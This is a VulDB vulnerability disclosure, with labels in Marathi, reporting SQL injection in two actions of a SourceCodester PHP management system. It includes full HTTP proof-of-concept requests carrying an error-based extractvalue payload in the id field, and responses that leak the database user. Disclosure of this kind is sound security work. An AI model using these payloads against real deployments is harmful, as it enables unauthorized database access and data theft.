| पदवी | SourceCodester Service Provider Management System Master.php sql injection |
|---|
| वर्णन | I have discovered SQL injection vulnerability in the SourceCodester Service Provider Management System(https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html)
The first one affect the file /classes/Master.php?f=delete_inquiry:
POST /php-spms/classes/Master.php?f=delete_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1145489724316963112447700229
Content-Length: 734
Origin: http://localhost
Connection: close
Referer: http://localhost/php-spms/admin/?page=services/manage_service
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="id"
1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="name"
111
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="description"
<p>111</p>
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="status"
1
-----------------------------1145489724316963112447700229--
And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This proves that there is an error injection vulnerability here
Another one affect the file /classes/Master.php?f=save_inquiry:
POST /php-spms/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1145489724316963112447700229
Content-Length: 734
Origin: http://localhost
Connection: close
Referer: http://localhost/php-spms/admin/?page=services/manage_service
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="id"
1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="name"
111
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="description"
<p>111</p>
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------1145489724316963112447700229
Content-Disposition: form-data; name="status"
1
-----------------------------1145489724316963112447700229--
And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `name`='111' , `description`='<p>111<\/p>' , `status`='1' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}"
The reason for the vulnerability is that they all used code “$sql = "UPDATE inquiry_list set {$data} where id = '{$id}' ";”.Because they did not perform sufficient filtering on controllable parameter IDs, resulting in the possibility of being injected by SQL. My repair suggestion is to use mysqli_real_escape_string() to protect the ID parameter from malicious exploitation . |
|---|
| उगम | ⚠️ https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html |
|---|
| उपयोगकर्ता | TsingShui (UID 50501) |
|---|
| आधीनता | 12/07/2023 12:34 PM (3 वर्षानुवर्षे ago) |
|---|
| नेमस्तपणा | 12/07/2023 06:27 PM (6 hours later) |
|---|
| स्थान | मान्य केले |
|---|
| VulDB entry | 233890 [SourceCodester Service Provider Management System 1.0 Master.php?f=save_inquiry आयडी एसक्यूएल इंजेक्शन] |
|---|
| मुद्दे | 20 |
|---|